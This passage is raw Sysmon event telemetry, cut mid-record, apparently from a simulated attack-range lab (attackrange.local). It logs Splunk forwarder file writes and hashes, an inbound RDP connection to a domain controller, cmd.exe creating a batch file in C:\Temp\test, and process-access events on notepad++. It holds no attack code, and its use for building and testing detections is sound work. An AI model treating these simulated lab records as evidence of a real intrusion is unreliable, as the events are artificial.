Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0AA3FC9C29A291BBC480616A6C9AD13,SHA256=D7E6261F7AE09C0C5A1FB5B39E55097E779D86E0D139D2F2A991AFF5D11A609F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806180Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:30.058{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=3B7CC158AFC88E8D64C26BFDDC557317,SHA256=B238AF01554A0AA32F7F149EF9BE1550EB5FEAA37CC5A0F806BAE961D3B68C72,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046048Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:23.685{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-53565-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001046047Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:31.505{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC07669EC16CFD2265ABCF8593FB16BE,SHA256=7370DD8BEBD22B91143C6C9D9AD9E17F49461798945C4EA56CE510E531FE3D29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806182Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:31.183{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=571600400B6BB20ECF3E38403CF1C794,SHA256=02176A86186FE354444C4797375D752C489AA599E15329F4FD2E267EEEC44184,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046049Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:32.519{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E147229D9714BD5B3B4735F1C5EA728A,SHA256=B1D746ABD42D9E16FEF3D97D0F8505546CC8DDA071F2487E153F7565D887C68B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806183Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:32.261{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B755E30F06A91FC6A4AEF13FF3B1D80,SHA256=71684FD2423FE78295CB161D6CF3429DE09FA9046BB17A575E1FC5F652D2E3BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806185Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:32.237{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57160-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806184Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:33.308{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F932E03C56784567574DF17B1CF2022,SHA256=04D58DBB82A45FD67C5A62C9862BC3A20FB9FCEDB979E8285B3F18940E01B155,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046051Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:33.759{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD3BE271808CAEDCBEDA8807448EC297,SHA256=6F096B4BD2ED602C5B6D5DEC7B7E4A779C502E24294CCD61A36342A2FADD235D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046050Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:33.549{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48ADDF6E1647160E03D43D259F57B245,SHA256=824E789D75FAE2096929C61241BBBF54BA149BD1822440E167C0FF1704A1B8F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806186Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:34.344{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9872757ABA0EF8D92373EC5588133B2C,SHA256=04035345B67BBE87E4F63E46F62138FCBC590943D10DDB8D68B98DA18AC045C3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046055Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:26.758{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50914-false10.0.1.12-8000- 23542300x80000000000000001046054Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:34.550{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6CCC9F40B92FD27A68E172441349089,SHA256=B9051F58300736044517B03BD499A1C3A53EA6243F58882CA2AD471C6C09EA4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046053Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:34.134{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=36293ADF60D97F3305FBC7893C4C418D,SHA256=6AADAF298C86C4A08FDEB75C17B60E913DD726AA7C35BA04F1ADDF92BA474E3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046052Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:34.134{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=376E2F2378BD3C25F4241C4BF93CE2EC,SHA256=89DB06D16D7CEBFF7A26CE558C78137BB56FA2604700315988E58F274A498374,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806187Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:35.359{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9253E8DEA2B55B0FB9CC5607B9F2985E,SHA256=95476BEA76CFE30333EFB08ABA5383A12B81FF3A32A1ED0CD126073C10AF030B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046056Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:35.569{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C694D796C9AF86F300337E77778590F,SHA256=F3E319E43076ED619A765C5E15740642D4BAAA5A376560109D196F10C6A05924,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046057Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:36.587{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53712CAC9492D985BC222ADB51C002B0,SHA256=D9110B64D664C377C6A06C60F0B8058078D39149077980D945CDE3AB263A4661,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806188Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:36.452{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02FFF1A97EF6CD93B770DF72180BA32E,SHA256=0C393E453911F4355842B8EA916A1E85D0EEF241E2FD36BF5959DE97C11C2956,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046058Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:37.617{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A2C5F41832695F10518CCE68E894EB5,SHA256=AA063D6CB96F8CFB225D0A52BD35FAFFB9A219D1768112CDCAD765FC7D2F7A8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806189Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:37.468{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1E6D9A000BC37D6A5BB3F32495EFD5E,SHA256=7BE82D756E97242B69AF45C65FB80543E933E7DABBBE5F6D6D589F8A6463A010,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806190Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:38.468{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A507C214CD6A93CCE196351981EA83E,SHA256=CA2B7DAC1DC31D3D7F9A0B4C4142BA8561061B7D02961DBBAF9EE543D9600D8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046061Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:38.631{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B405558BAE5DDFC851689CC6B11A03B,SHA256=30F351135D106426EC2EB6467263909EF7FE903C1489A119511C168763B6EDEB,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001046060Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:38.450{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=271F2A7C9319C4B799BFF145C0E8187C,SHA256=8CCD0056855EABD470BBB082AA5F5861F7AF0A24125A82ECD6E5689865BA340A,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001046059Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:38.364{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\system32\cmd.exeC:\Temp\test\sil.bat2021-07-12 07:44:38.363 354300x8000000000000000806192Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:38.257{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57161-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806191Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:39.485{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA57B6724BC48E2720FDB3C0EAFFC62C,SHA256=F85419D8E4D7D3D4CADB42129F93E5136F02CD0DB3ED59ABB8111ADE1834E232,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046062Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:39.646{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C39C41204E1BEDCF742A599C6ABFD087,SHA256=B968433B161774310BB729766E419F5DFC45F9DE2892EE5C945021492BF12E20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806193Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:40.545{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF99C8C270D3B9124DEF893037579DA3,SHA256=6BF0C205B6FAEBC593BAF51E88D7CC39DBD5F50187C0CF2F4268DADFBF6216F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046063Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:40.663{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8724DDD780D25116168850257EB8DBD1,SHA256=141910656E0C1B3B8FDAF5D1C1DCF434647B30831FA1D649B8F0BDD69AF11B86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046065Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:41.682{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1345E112726DABE25A51E6E38DFBC2B5,SHA256=B07A2949B62E4E539194B9A630DE37AA2C25615FF648CC7A68B16AC4DA78AE88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806194Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:41.547{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC899CF94D24F8640C95A7EC5A494203,SHA256=734DD18CA2CD57C49FB2B763FA068EB8E40F967CAF0BF23C04073D43F2011057,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046064Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:32.639{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50915-false10.0.1.12-8000- 23542300x80000000000000001046066Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:42.781{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00023F87DCDA4678C0829B4214163563,SHA256=C67B4D23F38CF444FB04224AA1E9C3F1A917F12A2C0D085C8E6A2EFFC4789B72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806195Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:42.547{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=648244FFD40B8B91E66CA7CDEB5826DF,SHA256=A6C3324A808BB83D2FFA11095C162E461FED0F8560B550EEEFEA612E677FAB03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806196Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:43.578{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=261DEA4EBCE45B03C1D6A99FE00E172A,SHA256=B5BD02FDD26EF01E278CA40A94E7A767A7BBC95FD537F42CC15B188D46215DF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046067Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:43.782{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1383365A59908EE395C1C2BA04EB72F5,SHA256=2596F87408C6EE2D9AD21D3AD62A3D2D4579AA9C2B7EC2E00BFC0CF1E6F34B4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806197Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:44.578{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DF4FC0B99440D823F3E5E2FD1007DC6,SHA256=D373DB0D6C0854EC230F81D21B98FCFA565E14EE9632E54AE776E2EDEC423E54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046068Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:44.796{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19128E7E22B9C856FE12DB150F3567ED,SHA256=BF13495AC01EE61A08C6B65A8922B2F73963A3FB0D07C5435422C12DEFA9DE98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046083Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:45.812{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C77957A429339DAE46B094E0B314CD07,SHA256=34567E17AC4C2B16387DAE0D043C4AE17E5C407E2CE2557F10D3405BA4FCD7A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806198Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:45.610{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EC7230804BF7BF98B0680C3CF86BD92,SHA256=3E47B320301AD78A5A010E6488BC5094D3D7803C4A121BDD22A12995C58985C6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046082Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.365{466BC892-32D3-60E8-770B-00000000CF01}63567316C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046081Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:45.364{466BC892-32D3-60E8-770B-00000000CF01}63567316C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046080Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.364{466BC892-32D3-60E8-770B-00000000CF01}63567316C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046079Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.344{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046078Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.344{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046077Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.344{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046076Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:45.344{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046075Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 